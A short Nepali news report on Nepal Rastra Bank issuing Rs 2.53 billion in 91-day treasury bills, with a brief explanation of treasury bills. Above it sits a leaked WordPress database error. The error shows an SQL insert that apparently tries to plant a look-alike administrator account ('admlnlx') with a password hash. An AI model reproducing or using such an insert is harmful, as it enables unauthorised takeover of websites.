WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBM3o0U7f1JXXW7str.Bt/iAdL1uMo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:21:13', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २८ माघ, काठमाडौं । नेपाल राष्ट्र बैंकले पुनः २ अर्ब ५३ करोड रुपैयाँको ट्रेजरी बिल जारी गर्ने भएको छ । राष्ट्र बैंकले उक्त परिमाणको ट्रेजरी मंगलबार जारी गर्ने भएको हो ।
राष्ट्र बैंकले ९१ दिनका लागि मात्रै २ अर्ब ५३ करोडको ट्रेजरी जारी गर्न लागिएको जनाएको छ । यसका लागि राष्ट्र बैंकले आज सोमबार नै बोलकवोलमा सहभागी हुन आग्रह गरेको छ । आज सोमबार ३ बजे बोलकवोल भएर मंगलबार जारी हुने ट्रेजरी ०७६ वैशाख ३१ गते परिपक्व हुनेछ ।
यसअघि राष्ट्र बैंकले माघ २१ गते ५ अर्ब १६ करोड रुपैयाँको ट्रजरी बिल जारी गरेको थियो ।
ट्रेजरी बिल एक वर्ष वा एक वर्षभन्दा कम अवधिको आन्तरिक ऋण उठाउन प्रयोग गरिने अल्पकालीन सरकारी ऋणपत्र हो । सरकारलाई आवश्यक पर्ने अल्पकालीन अवधिको (बढीमा एक वर्ष) स्रोत जुटाउन यो बिल बिक्री गरिन्छ ।
एकै व्यक्ति वा संस्थाले अलग–अलग वा बहुमूल्यमा पनि बोल गर्न सकिने व्यवस्था छ । ट्रेजरी बिलमा ब्याजदरको सट्टा डिस्काउण्ट दर लागू गरिन्छ । डिस्काउण्ट दर बोलकबोलको माध्यमबाट निर्धारण हुन्छ ।
सभार:अनलाइन्खबर